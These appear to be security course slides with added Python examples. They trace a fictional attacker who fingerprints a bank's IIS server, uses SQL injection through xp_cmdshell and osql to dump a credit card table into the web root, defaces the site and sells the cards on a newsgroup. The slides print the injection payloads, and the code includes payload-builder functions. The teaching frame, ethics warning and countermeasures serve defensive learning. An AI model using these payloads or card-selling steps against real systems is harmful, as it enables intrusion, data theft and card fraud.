TEL 283 Getting out of Credit Card Debt
Resources Utilized • Chained Exploits • Whitaker, Evans, Voth; Addison-Wesley, 2009
Ethics • The methods discussed in this course are illegal when used without authorization • Under no circumstances should these tools or methods be used on any networked system without the explicit written permission of an authorized grantor within that organization • That document should be witnessed and should delineate the boundaries of your actions • You sign a document for this course indicating that you understand and appreciate the nature of the concepts and methodologies
Ethics • What is the purpose of teaching these methods and tools? • So that you, as a professional, will understand the methods and tools and be able to determine • When and how they were leveraged against you • Find traces of them during an investigation • Proactively search for and deter an attack
What is a “Chained Exploit”? • Attack consisting of several exploits or attacks in order to achieve a goal
Credit Card debt • “Phoenix” (obviously not his real name) is in debt for thousands of dollars to a bank’s credit card system, and his rate has just gone up to 29% • Plans to pay off his debt by hitting the bank’s system (PDXO Financial) • If he uses another person’s card to pay off his, it’ll be noticed • Plans to steal cc information and sell it on the black market
Steps • Enumerate the website • Enumerate the CC database • Get the CC info out through the website • Sell the CC info on the underground market • Deface the website (misdirection)
Enumerate the website • Uncover as much information about the website as possible • Operating system • Web server software and version • RFC 2616 (HTTP/1.1) specifies the format of HTTP responses, including the Server header • Some headers returned contain valuable information about the server software or the site
Enumerate the website • Telnet to the website on port 80 (or whatever port the site listens on): telnet www.PDXOfinancial.com 80 • Once connected, issue a HEAD request so that only the response headers come back: HEAD / HTTP/1.1 [cr] Host: www.PDXOfinancial.com [cr] [cr] • HTTP/1.1 requires the Host header; HEAD / HTTP/1.0 followed by a blank line works without it • The Server header, if present, reveals the web server type and version • Example: HEAD request against www.marist.edu
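The same HEAD request done by hand in Python, as an added example that is not code from the book or from the course slides. It talks to a stand-in server started in the same process, whose response and "Microsoft-IIS/5.0" banner are constructed, so it runs offline; pointing head_headers() at a real host is only appropriate with the written permission described on the Ethics slide. The Host header is sent because HTTP/1.1 requires it.

```python
import socket
import threading

# Constructed response for the local stand-in server. The banner values are
# illustrative (assumption): a real IIS 5.0 box sends "Microsoft-IIS/5.0".
FAKE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def start_fake_server(response=FAKE_RESPONSE):
    """Listen on 127.0.0.1 on a free port, answer one request with `response`, stop.
    Returns the port so the client can be pointed at it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)          # read the HEAD request, ignore its content
            conn.sendall(response)
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return port


def head_headers(host, port=80, timeout=5.0):
    """Send 'HEAD / HTTP/1.1' over a raw socket, as one would by hand in telnet,
    and return (status line, {header name lower-cased: value})."""
    request = (
        "HEAD / HTTP/1.1\r\n"
        f"Host: {host}\r\n"          # required by HTTP/1.1; without it many servers answer 400
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while b"\r\n\r\n" not in raw:      # the header block ends at the first blank line
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def fingerprint(host, port=80):
    """What the HEAD request reveals about the server, or a marker when the
    header has been removed (the first countermeasure at the end of the deck)."""
    status, headers = head_headers(host, port)
    return {
        "status": status,
        "server": headers.get("server", "<not disclosed>"),
        "x-powered-by": headers.get("x-powered-by", "<not disclosed>"),
    }


if __name__ == "__main__":
    port = start_fake_server()
    print(fingerprint("127.0.0.1", port))
```

Running it prints the constructed banner; against a server that has had its Server header stripped, fingerprint() reports "<not disclosed>", which is exactly the signal the countermeasure slide is after.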
Goolag Scanner • Tool developed by the Cult of the Dead Cow (www.cultdeadcow.com) • Automates the Google hacking techniques catalogued by Johnny Long (johnny.ihackstuff.com) • Runs a list of search strings ("dorks") against the target site to find files containing passwords, vulnerable files, or directories of interest
Background information • PDXO merged with another company • Development websites might still be running because of the changes • development.PDXOfinancial.com • beta.PDXOfinancial.com • test.PDXOfinancial.com • dev.PDXOfinancial.com • Trying the likely names may bring up an unprotected web page • In this case, the login form
Enumerate the CC Database • Is the DB server on the same host as the website? • Is MS SQL Server used for the DB? • Is the default login "sa" in use without a password? • Is the website installed in the default IIS location, inetpub\wwwroot? • On this target that directory is writable, so a file dropped there is served straight back by IIS • This presumes several weaknesses at once • Plausible here because the page comes from a development site • Moral: build security in, even during the development phase of the SDLC
SQL Injection • Supplying input that the application pastes unchecked into an SQL statement, so that a user on the client side decides what command the database executes
Uncover the names of the databases • The system database is called "master" • Get the names of all databases from the master..sysdatabases catalogue view: select * from master..sysdatabases • The form's own query expects a username value, so the injected input must first end that statement: place the statement terminator ";" before the select command: ; select * from master..sysdatabases • Whatever the application appends after the input is neutralised by adding the comment indicator "--" after the command: ; select * from master..sysdatabases -- • If the form value sits inside single quotes in the application's query, a leading ' closes that literal first
OSQL • The problem with injecting a bare select is that the web page never displays the result set • Use "osql", the SQL Server command line utility, and send its output to a text file instead • Parameters for osql • -U username • -P password (an empty string if none is set) • -Q run the given SQL command and exit • -o output file: osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\output.txt
OSQL • osql is a command line utility and must be run from a command prompt • The attacker has no command prompt, only the web form • The xp_cmdshell extended stored procedure runs an operating system command from inside SQL Server: exec xp_cmdshell '<command goes here>' • So the injected input becomes: ; exec xp_cmdshell 'osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\output.txt' -- • This works only because the login is sa: xp_cmdshell is limited to sysadmin members, and the command runs under the SQL Server service account, which here can write into wwwroot
SQL Injection • Phoenix submits the SQL command through the form to the web server • The web server passes the command on to the database server for execution without any validation • The text file is written into the web server's document directory • Phoenix changes the URL to that of the output file on the server and browses its contents • He examines the list and spots a database of interest, shown with its data file path as listed in sysdatabases: creditcards C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF
SQL Injection • Now that the database name is known, get the table names by changing the SQL command: select * from creditcards..sysobjects (user tables have xtype = 'U') • One of the tables is called "cardnumbers": select * from creditcards..cardnumbers • The dumped rows land in the output file on the IIS server • The table contains names, expiration dates, CVVs, card numbers and PINs
Selling CC Information • Phoenix uses an NNTP client (NewsRover) to read the alt.2600 newsgroup • He posts a message offering the card data for sale • A bogus email address is set up for the deal: getyourcardshere@gmail.com • "spammimic" (www.spammimic.com) disguises the real message as spam • To a casual reader it looks like a spam message; those in the know recover the hidden text by decoding it with spammimic • The encoding can be password protected, or made to look like a PGP message or like Cyrillic text • The message is posted to alt.2600 under the phony email address • A respondent agrees to pay $12,000 into a Swiss account • Phoenix's own card number is among the cards sold • Phoenix then cancels his card
Defacing the Website • IIS 5.0 server • MS SQL Server • Default login sa without a password • Database hosted on the same host as the website • The xp_cmdshell stored procedure is used once more, this time to overwrite the landing page: ;exec xp_cmdshell 'echo You''ve been hacked! > c:\inetpub\wwwroot\default.asp' -- • The apostrophe in "You've" has to be doubled inside the T-SQL string literal; a single apostrophe would end the literal early and the injection would fail with a syntax error
Countermeasures • Remove or change the default HTTP Server response header (it only hides the version; the fixes below are what actually matter) • Do not allow public access to development sites • Do not keep SQL Server on the same host as the IIS server • Validate user form input and, above all, pass it to the database as bound parameters rather than concatenating it into the SQL text • Don't install the website in the default IIS location (raises the bar only slightly) • Make the web root read-only to everything except the deployment process, and in particular to the SQL Server service account • Disable xp_cmdshell and any other extended stored procedures the application does not need • Don't use defaults (username / password) for the database, and give the application its own least-privilege login rather than sa
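An added example, not code from the book or from the course slides, that builds the injected form values of the SQL injection slides and of the defacing slide above stage by stage (the "; ... --" wrapper, the osql command line, the xp_cmdshell wrapper with its doubled apostrophe) and then shows, against an in-memory sqlite3 database standing in for MS SQL Server, why the terminator-and-comment trick works when input is concatenated into the statement and fails when it is bound as a parameter. The table names, account numbers, card data and file paths are constructed; sqlite has no osql or xp_cmdshell, so the injected statement copies the card table into a table the attacker reads back afterwards, which plays the part of the text file under wwwroot.

```python
import sqlite3

# --- 1. The injected form value, built stage by stage ------------------------

def stack(statement):
    """';' ends the application's own statement, ours runs next, and '--'
    comments out whatever the application appends after the input."""
    return f"; {statement} --"


def osql_cmd(query, outfile=r"c:\inetpub\wwwroot\output.txt", user="sa", password=""):
    """osql command line: run `query` as `user` and write the rows to `outfile`,
    here a path under the web root so the attacker can fetch it with a browser."""
    return f'osql -U {user} -P "{password}" -Q "{query}" -o {outfile}'


def xp_cmdshell(command):
    """Wrap an OS command in xp_cmdshell (fully qualified so it resolves from any
    database context). In a T-SQL string literal an apostrophe is written as two
    apostrophes; without that, "You've" would end the literal early."""
    return "exec master..xp_cmdshell '" + command.replace("'", "''") + "'"


def dump_via_web(query, outfile=r"c:\inetpub\wwwroot\output.txt"):
    """Form value that makes SQL Server write a query's result under wwwroot."""
    return stack(xp_cmdshell(osql_cmd(query, outfile)))


def deface(page=r"c:\inetpub\wwwroot\default.asp", text="You've been hacked!"):
    """Form value that overwrites the landing page."""
    return stack(xp_cmdshell(f"echo {text} > {page}"))


# --- 2. Why the trick works: concatenation vs. bound parameters --------------
# Constructed stand-in for the bank's database (sqlite3 instead of MS SQL Server;
# the tables, account numbers and card data are made up).

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE accounts (account TEXT, balance INTEGER);
        CREATE TABLE cardnumbers (name TEXT, number TEXT, cvv TEXT);
        INSERT INTO accounts VALUES ('1001', 250), ('1002', 9000);
        INSERT INTO cardnumbers VALUES ('A. Person', '4111111111111111', '123');
    """)
    return conn


def vulnerable_lookup(conn, account):
    """Form input pasted into the SQL text and handed to the driver as a batch.
    executescript() stands in for a driver that accepts several statements in
    one call, as the MS SQL drivers do; that is what lets ';' add a second one."""
    sql = f"SELECT balance FROM accounts WHERE account = '{account}'"
    conn.executescript(sql)


def safe_lookup(conn, account):
    """Same query with a bound parameter: the input is data and can never become
    part of the statement, whatever quotes, ';' or '--' it contains."""
    return conn.execute(
        "SELECT balance FROM accounts WHERE account = ?", (account,)
    ).fetchall()


def table_names(conn):
    return sorted(row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"))


def demo():
    """Run the same attacker input through both handlers and report the outcome."""
    # The leading quote closes the form value's string literal; the injected
    # statement stashes the card table where it can be read back later, the
    # way output.txt under wwwroot is read back with a browser.
    attacker_input = "'" + stack(
        "CREATE TABLE output AS SELECT name, number, cvv FROM cardnumbers")

    vuln = make_db()
    vulnerable_lookup(vuln, attacker_input)
    loot = vuln.execute("SELECT name, number, cvv FROM output").fetchall()

    safe = make_db()
    rows = safe_lookup(safe, attacker_input)   # treated as an unknown account number
    return {"loot": loot, "safe_rows": rows, "safe_tables": table_names(safe)}


if __name__ == "__main__":
    print(dump_via_web("select * from master..sysdatabases"))
    print(deface())
    print(demo())
```

The first two prints reproduce the slides' payloads; demo() shows the concatenating handler leaking the card row while the parameterised handler returns nothing and creates no table, which is the "validate input / use parameters" countermeasure in action.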